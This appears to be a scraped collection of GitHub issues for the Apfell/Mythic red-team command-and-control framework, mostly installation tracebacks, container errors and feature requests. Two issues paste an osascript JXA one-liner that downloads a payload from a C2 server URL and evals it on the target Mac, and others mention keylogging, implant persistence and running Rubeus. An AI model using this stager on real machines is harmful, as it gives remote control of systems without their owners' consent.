Hi @its-a-feature,

As i tested the download feature from Atlas Payload.

Could you please have a look ?
Thanks in advance ^^!.

Execution error on macOS using jxa agent

Hi, so I've got Apfell up and running on Ubuntu server.
Installation was smooth so no problem with that, I want to thank you for such detailed installation/user guide.
I did test viper agent and it worked fine on Linux test machine.
But when it comes to jxa agent for macOS, I'm getting error when trying to execute this command via Terminal:
osascript -l JavaScript -e "eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding($.NSData.dataWithContentsOfURL($.NSURL.URLWithString('http://xxx.xxx.xx.xxx/api/v1.3/files/download/redacted')),$.NSUTF8StringEncoding)));"
Output error:
execution error: Error on line 135: TypeError: $.SecKeyCreateRandomKey is not a function. (In '$.SecKeyCreateRandomKey(parameters, Ref())', '$.SecKeyCreateRandomKey' is undefined) (-2700)
I have made sure that I can access the payload from target machine when pulling it manually. IPs are not blocked.
Machine is running macOS Sierra 10.12.
Has Oracle JDK 13.0.1 installed.
I've reviewed all 9 previous issues and none seem to be related. So, I hope you can point me to right direction! Thank you.

[Improvement] Create Homebrew package

This project is awesome!

It would be great if there were a Homebrew package for this project so that one could run brew install apfell to install it.

I can work on this tomorrow if you think it would be a good feature.

Apfell 1.4 Poseidon container error

Hello, and thank you for Apfell! I've only played with it for a few days (1 day of Apfell 1.3 and 1 day of 1.4), so forgive me if I seem stupid. :)

On Kali 2020.1 - suspect a few folks will experiment with Apfell on Kali before production deployment - I get an error regarding the Poseidon container when starting Apfell (screenshot attached). This does not seem to negatively impact the rest of Apfell 1.4, because the new HTTP C2 implant worked just fine. Nice job on the HTTP C2 configurability by the way, very reminiscent of Cobalt Strike but with some new twists, too.

The Poseidon payload's status is then red in the Apfell GUI, with a message of 'No heartbeat from container in over 30 seconds' (screenshot attached).

PS: Installed docker on Kali 2020.1 using the following guide: https://medium.com/@airman604/installing-docker-in-kali-linux-2017-1-fbaa4d1447fe and docker versions installed as a result attached as screenshot, in case relevant.

Apologies for only reporting this, but at the moment I don't have time to investigate and propose a fix (only need HTTP C2 right now), so this is just a heads up, in case useful.

macOS installation error

macOS: High Sierra
Python: 3.7.2

Trying to run sudo python3 server.py produces the following error:

`Traceback (most recent call last):
File "/usr/local/lib/python3.7/site-packages/peewee.py", line 3768, in _create_connection
return self._connect(self.database, **self.connect_kwargs)
File "/usr/local/lib/python3.7/site-packages/peewee.py", line 4164, in _connect
conn = psycopg2.connect(database=database, **kwargs)
File "/usr/local/lib/python3.7/site-packages/psycopg2/init.py", line 130, in connect
conn = _connect(dsn, connection_factory=connection_factory, **kwasync)
psycopg2.OperationalError: FATAL: role "apfell_user" does not exist

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/usr/local/lib/python3.7/site-packages/peewee.py", line 3828, in execute_sql
cursor = self.get_cursor()
File "/usr/local/lib/python3.7/site-packages/peewee.py", line 3774, in get_cursor
return self.get_conn().cursor()
File "/usr/local/lib/python3.7/site-packages/peewee.py", line 3763, in get_conn
self.connect()
File "/usr/local/lib/python3.7/site-packages/peewee.py", line 3738, in connect
self._local.conn = self._create_connection()
File "/usr/local/lib/python3.7/site-packages/peewee.py", line 3768, in _create_connection
return self._connect(self.database, **self.connect_kwargs)
File "/usr/local/lib/python3.7/site-packages/peewee.py", line 3656, in exit
reraise(new_type, new_type(*exc_args), traceback)
File "/usr/local/lib/python3.7/site-packages/peewee.py", line 135, in reraise
raise value.with_traceback(tb)
File "/usr/local/lib/python3.7/site-packages/peewee.py", line 3768, in _create_connection
return self._connect(self.database, **self.connect_kwargs)
File "/usr/local/lib/python3.7/site-packages/peewee.py", line 4164, in _connect
conn = psycopg2.connect(database=database, **kwargs)
File "/usr/local/lib/python3.7/site-packages/psycopg2/init.py", line 130, in connect
conn = _connect(dsn, connection_factory=connection_factory, **kwasync)
peewee.OperationalError: FATAL: role "apfell_user" does not exist

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "server.py", line 1, in
from app import apfell, dbloop, apfell_db, db_objects, use_ssl, listen_port, listen_ip, ssl_cert_path, ssl_key_path
File "/Users/username/Desktop/test/apfell/app/init.py", line 53, in
import app.routes
File "/Users/username/Desktop/test/apfell/app/routes/init.py", line 1, in
from app.routes import routes, operations_routes, websocket_routes, api_routes, payloads_routes, services_routes, authentication, reporting_routes
File "/Users/username/Desktop/test/apfell/app/routes/routes.py", line 6, in
from app.database_models.model import Operator, Operation, OperatorOperation, C2Profile, PayloadType, Command, CommandParameters, Transform, ATTACK, Artifact
File "/Users/username/Desktop/test/apfell/app/database_models/model.py", line 1312, in
Operator.create_table(True)
File "/usr/local/lib/python3.7/site-packages/peewee.py", line 5028, in create_table
if fail_silently and cls.table_exists():
File "/usr/local/lib/python3.7/site-packages/peewee.py", line 5024, in table_exists
return cls._meta.db_table in cls._meta.database.get_tables(**kwargs)
File "/usr/local/lib/python3.7/site-packages/peewee.py", line 4199, in get_tables
return [r for r, in self.execute_sql(query, (schema,)).fetchall()]
File "/usr/local/lib/python3.7/site-packages/peewee_async.py", line 1041, in execute_sql
return super().execute_sql(*args, **kwargs)
File "/usr/local/lib/python3.7/site-packages/peewee.py", line 3837, in execute_sql
self.commit()
File "/usr/local/lib/python3.7/site-packages/peewee.py", line 3656, in exit
reraise(new_type, new_type(*exc_args), traceback)
File "/usr/local/lib/python3.7/site-packages/peewee.py", line 135, in reraise
raise value.with_traceback(tb)
File "/usr/local/lib/python3.7/site-packages/peewee.py", line 3828, in execute_sql
cursor = self.get_cursor()
File "/usr/local/lib/python3.7/site-packages/peewee.py", line 3774, in get_cursor
return self.get_conn().cursor()
File "/usr/local/lib/python3.7/site-packages/peewee.py", line 3763, in get_conn
self.connect()
File "/usr/local/lib/python3.7/site-packages/peewee.py", line 3738, in connect
self._local.conn = self._create_connection()
File "/usr/local/lib/python3.7/site-packages/peewee.py", line 3768, in _create_connection
return self._connect(self.database, **self.connect_kwargs)
File "/usr/local/lib/python3.7/site-packages/peewee.py", line 3656, in exit
reraise(new_type, new_type(*exc_args), traceback)
File "/usr/local/lib/python3.7/site-packages/peewee.py", line 135, in reraise
raise value.with_traceback(tb)
File "/usr/local/lib/python3.7/site-packages/peewee.py", line 3768, in _create_connection
return self._connect(self.database, **self.connect_kwargs)
File "/usr/local/lib/python3.7/site-packages/peewee.py", line 4164, in _connect
conn = psycopg2.connect(database=database, **kwargs)
File "/usr/local/lib/python3.7/site-packages/psycopg2/init.py", line 130, in connect
conn = _connect(dsn, connection_factory=connection_factory, **kwasync)
peewee.OperationalError: FATAL: role "apfell_user" does not exist`

Update

When will version 1.5 be updated?

when terminal closes on target macOS machine it kills the active PID

please forgive the n00b question.
when terminal closes on target macOS machine it ends the active PID, how do we successfully close the terminal on target machine without killing the process?

Thank you!

osascript -l JavaScript -e "eval(ObjC.unwrap( $.NSString.alloc.initWithDataEncoding( $.NSData.dataWithContentsOfURL( $.NSURL.URLWithString('http://serverIPhere/update.js')), $.NSUTF8StringEncoding)));"

Deleted Payload

Hi,

Not sure that it is on purpose or not but when you delete a created payload, a payload already deployed can still connect to the Mythic Server. The result of deleting a payload should not be like a payload that never existed, UUID not known/allowed to connect to the Mythic Server?

Version of Mythic: 2.1.17

Thx

Too much disk usage

The docker build environment occupies more than ten gigabytes of disk, can't all services get a container?

starting program? Empty the docker image? ? ?

The previous docker image is gone, can anyone tell me what happened? ? ?

Invalid Hostname

Hi,

I'm having a slight issue with regards to the Mac Hostname running a JXA payload, I've attached an image for example. The hostname returned by the shell command is correct however the one on the implant table is incorrect. The name within the implant table is a valid hostname for a device unrelated to the implant.

HTTP C2 profile with JXA: failed connection

Does the jxa payload require https? I'm testing on a private network, with http://<private-ip> as the only URL in urls[], so I don't have HTTPS since letsencrypt requires a public domain and self-signed certs don't work with the apfell-jxa.

However, I get this error every time I run a payload:

error in post_agent_message: HTTPSConnectionPool(host='localhost', port=XXXX): 
Max retries exceeded with url: /api/v1.4/agent_message (Caused by 
NewConnectionError('<urllib3.connection.HTTPSConnection object at 0x7f5589ef8a58>: 
Failed to establish a new connection: [Errno 111] Connection refused',))

ApFell HTTP Payloads Does not work with anything other than Exit Command

Hi!

I'm just starting out with this C2, and I'm running into the following issue. I'm running the C2 server v2.1.7 on a Ubuntu 20.10 VM, with the "Victim" machine being a MacVM running Catalina 10.15.6.

With the following Payload configuration:
TargetOS: MacOS
Payload Profile: HTTP - apfell, posideon (Only changes made here is the callback host, which I set to http://)
Payload type: Apfell
commands: exit

This works fine, I get a callback to my C2.

However, if I add any other additional commands on top of exit (eg load or shell), I get the following:

I also performed a wireshark capture on the C2 server, and it looks like when I attempt a callback with the "Exit + Other commands" payload, it never actually manages to successfully perform any GET or POST requests:

In contrast, the following shows a capture with a working "Exit only" payload:

As part of my troubleshooting, I have attempted to connect the two machines via WiFi and Ethernet, with the same result. I have also executed the payload on the Mac VM with and without sudo, with the same result. Is there any other troubleshooting steps I can take? Thanks!

Atlas implant not working

Might be a bug?

Description:
Atlas payload executes and continues running in the background, but does not callback to server. I've used procmon to check and there doesn't seem to be any network traffic generated by it.

Steps to reproduce:

Start C2 default server
Generate Atlas implant, changing callback_host to server's ip address
Download implant and execute on Windows 10 vm

Expected:
The implant shows up in Active Callbacks list

Apfell Server:
Running on: Kali 2020.1 x86_64

Windows 10 VM:
OS: Windows 10 Pro
Version: 10.0.18363

Apfell immediately shuts down

The apfell_apfell container immediately shuts down after starting and won't start again even manually. It always hangs on ./wait-for-postgres. I am running on Ubuntu 18.04.

docker log apfell_postgres

PostgreSQL Database directory appears to contain a database; Skipping initialization

LOG:  database system was shut down at 2020-06-11 17:48:13 UTC
LOG:  MultiXact member wraparound protections are now enabled
LOG:  database system is ready to accept connections
LOG:  autovacuum launcher started
LOG:  incomplete startup packet
LOG:  incomplete startup packet
LOG:  incomplete startup packet

docker logs apfell_apfell

wait-for-postgres.sh: waiting 5 seconds for 127.0.0.1:5432
wait-for-postgres.sh: 127.0.0.1:5432 is available after 0 seconds
[Errno 2] No such file or directory
wait-for-postgres.sh: waiting 5 seconds for 127.0.0.1:5432
wait-for-postgres.sh: 127.0.0.1:5432 is available after 0 seconds
[Errno 2] No such file or directory

apfell-docker/wait-for-postgres.sh -h 127.0.0.1 -p 5432

wait-for-postgres.sh: waiting 5 seconds for 127.0.0.1:5432
wait-for-postgres.sh: 127.0.0.1:5432 is available after 0 seconds

I don't even know where to start debugging this, but commenting out the command line in docker_compose makes it crash on python3 instead of the wait-for script, and taking just the wait-for part out of the command makes it crash at "python /Apfell/serv…"

I'm not very familiar with docker but I also tried changing

["./wait-for-postgres.sh", "127.0.0.1:5432", "--", "python", "/Apfell/server.py"]

["./wait-for-postgres.sh", "127.0.0.1:5432", "--", "python", "./server.py"]

and got the same result. Changing to ["/Apfell/wait-for-postgres.sh", "127.0.0.1:5432", "--", "python", "/Apfell/server.py"] gives the error that /Apfell/wait-for-postgres.sh can't be found.

Feature Suggestion for Poseidon Dylibs

I noticed that the current Mythic way to produce a poseidon dylib requires 4-5 steps and the user to recompile files after editing them, etc. A much easier way to produce a dylib is to change go compilation inside https://github.com/its-a-feature/Mythic/blob/master/Payload_Types/poseidon/mythic/agent_functions/builder.py, i.e. to

command += (
                "xgo -tags={} --targets={}/{} -buildmode=c-shared -out poseidon .".format(
                    profile,
                    "darwin" if self.get_parameter("os") == "darwin" else "linux",
                    "amd64",
                    "default" if self.get_parameter("mode") == "default" else "c-archive",
                )

In this case we use c-shared rather than the defaults for -buildmode. Mythic will still produce a .zip file in this case, but in that zip file will be a working .dylib file which can be used with no further compilation/changes. I figure it would be easy to offer the user this option if they would like to compile a dylib, vs going the c-archive route which requires extra steps and more work on the user's part.

Error

Hello,
I'm got an issue, after installing with your install script,
im on mac os High Sierra 10.13.6,

im getting this error after i run the "sudo python3 server.py"

/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/psycopg2/init.py:144: UserWarning: The psycopg2 wheel package will be renamed from release 2.8; in order to keep installing from binary please use "pip install psycopg2-binary" instead. For details see: http://initd.org/psycopg/docs/install.html#binary-install-from-pypi.
""")
[2019-04-10 08:57:01 +0200] [5970] [INFO] Goin' Fast @ http://0.0.0.0:80
Exception in callback <function callback at 0x10e6d4048>
handle:
Traceback (most recent call last):
File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/peewee_async.py", line 1538, in _run_sql
yield from cursor.execute(operation, *args, **kwargs)
File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/aiopg/cursor.py", line 114, in execute
yield from self._conn._poll(waiter, timeout)
File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/aiopg/connection.py", line 238, in _poll
yield from asyncio.wait_for(self._waiter, timeout, loop=self._loop)
File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/asyncio/tasks.py", line 358, in wait_for
return fut.result()
File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/aiopg/connection.py", line 135, in _ready
state = self._conn.poll()
psycopg2.ProgrammingError: column t1.ui_config does not exist
LINE 1: ...gin", "t1"."active", "t1"."current_operation_id", "t1"."ui_c...
^

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "uvloop/cbhandles.pyx", line 49, in uvloop.loop.Handle._run
File "server.py", line 22, in callback
fetch_count = fut.result()
File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/sanic/app.py", line 696, in create_server
server_settings.get('loop')
File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/sanic/app.py", line 709, in trigger_events
await result
File "/Users/bylogbot/tools/Apfell/app/routes/routes.py", line 278, in setup_initial_info
await initial_setup()
File "/Users/bylogbot/tools/Apfell/app/routes/routes.py", line 283, in initial_setup
operators = await db_objects.execute(Operator.select())
File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/peewee_async.py", line 271, in execute
return (yield from execute(query))
File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/peewee_async.py", line 435, in execute
return (yield from coroutine(query))
File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/peewee_async.py", line 576, in select
cursor = yield from _execute_query_async(query)
File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/peewee_async.py", line 1550, in _execute_query_async
return (yield from _run_sql(query.database, *query.sql()))
File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/peewee_async.py", line 1543, in _run_sql
return cursor
File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/peewee.py", line 3656, in exit
reraise(new_type, new_type(*exc_args), traceback)
File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/peewee.py", line 135, in reraise
raise value.with_traceback(tb)
File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/peewee_async.py", line 1538, in _run_sql
yield from cursor.execute(operation, *args, **kwargs)
File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/aiopg/cursor.py", line 114, in execute
yield from self._conn._poll(waiter, timeout)
File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/aiopg/connection.py", line 238, in _poll
yield from asyncio.wait_for(self._waiter, timeout, loop=self._loop)
File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/asyncio/tasks.py", line 358, in wait_for
return fut.result()
File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/aiopg/connection.py", line 135, in _ready
state = self._conn.poll()
peewee.ProgrammingError: column t1.ui_config does not exist
LINE 1: ...gin", "t1"."active", "t1"."current_operation_id", "t1"."ui_c...
^

Execute_Assembly Timeout | Inject_Assembly Error

Hey Ho,

iam trying to load different assemblies, for example Rubeus.exe but i cant execute these.

And injecting does also throwing an error, which makes no sense to me :-)

Any Ideas ?

Regards
Flo

SSLv3 Ilegal Parameter Error

The current self signed certificate generated results in an "ERR_SSL_KEY_USAGE_INCOMPATIBLE" error when using Chrome 87, or an "sslv3 alert illegal parameter" if the certificate is imported into ncat.

This can be quickly fixed by adding the "-extensions v3_req" parameter to the openssl command in the start_mythic.sh script.

[Bug] - the runassembly and loadassembly commands of Atlas conflicted in new version

Hi @its-a-feature ,

Me again again ^^!.

As i tested the new version to working with download command we figure out that the commands "runassembly and loadassembly" is not working at new version (old version is still good ). May you please have a look ?

Thanks in advance.

[Request] Can we have line breaks for when stuff is listed either in a directory or output from a command

Another macOS error

I am able to sign in to Apfell and register new users however the default payloads aren't loading and visiting the page just says that the "socket is closed".
This also applies to the operations page as the default operation isn't loading either and trying to add a new operation also says that the "socket is closed".
Other pages display similar errors.

Any ideas?

Did you take the agent offline?

I can't find the apfell-jxa agent on github anymore...

[Features] - Extenstion for Atlas.

Hi @its-a-feature ,

Me again ^^!.
I'm checking if Atlas payload can support SMB named pipes like Covenant_c2 so we can implement the P-2-P C2 Profile.

Good to hear your opinions ^^!.
Thanks in advance.

Add support for setting the default admin password

Hello,

I'm trying to add wrappers around Apfell that will allow me to dynamically generate Apfell infrastructure using devops tools such as Terraform and Ansible. I would appreciate if there was a way to set the admin password as part of the config as opposed to having it set automatically in routes.py.

I figured that this could probably be done by using Docker to set an environment variable, and having routes.py check the value of the environment variable and recalculating the hash if it is set. That being said, this solution would split up configuration into both the Dockerfile as well as __init__.py. What do you think is the best way forward?

I'm happy to implement this feature myself and submit a PR but I wanted to reach out and get your ideas before starting.

Poseidon: 'CommandParameter' object has no attribute 'default_value'

If a non-required parameter is not supplied as part of a command, it will fail to process correctly when the command is entered. I haven't fully debugged, but it appears to be due to the following lines of code:

https://github.com/its-a-feature/Mythic/blob/master/Payload_Types/poseidon/mythic/CommandBase.py#L289-L295

Where a default_value attribute is looked for, but does not exist in the object (default_value is only used to set a value attribute in the init).

This can be easily reproduced with the sshauth command:

sshauth {"username": "root", "password": "root", "hosts": ["127.0.0.1"]}

error: this site cant be reached

Hey, i tried running code and when i run python3 server.py it returns 0.0.0.0:80. but when i open this on browser, it says connection refused.

please see the screenshot below:

Keylog command not found

Hi there,

I am trying to issue keylog to the apfell agent running on MacOS , but i dont see keylog command on active call backs section.

Documentation didnt say anything much except giving the agent response .Thanks

authentication failed

Hi. I install as it say in documentation. after i run ./status_check.sh

then "./display_output.sh apfell_apfell" and there is an error "FATAL: password authentication failed for user "apfell_user"".
I don't modify file "init.py".

Recommend Projects

React

A declarative, efficient, and flexible JavaScript library for building user interfaces.
Vue.js

🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript

TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
TensorFlow

An Open Source Machine Learning Framework for Everyone
Django

The Web framework for perfectionists with deadlines.
Laravel

A PHP framework for web artisans
D3

Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

javascript

JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
web

Some thing interesting about web. New door for the world.
server

A server is a program made to process requests and deliver data to clients.
Machine learning

Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Visualization

Some thing interesting about visualization, use data art
Game

Some thing interesting about game, make everyone happy.

Recommend Org

Facebook

We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft

Open source projects and samples from Microsoft.
Google

Google ❤️ Open Source for everyone.
Alibaba

Alibaba Open Source for everyone
D3

Data-Driven Documents codes.
Tencent

China tencent open source team.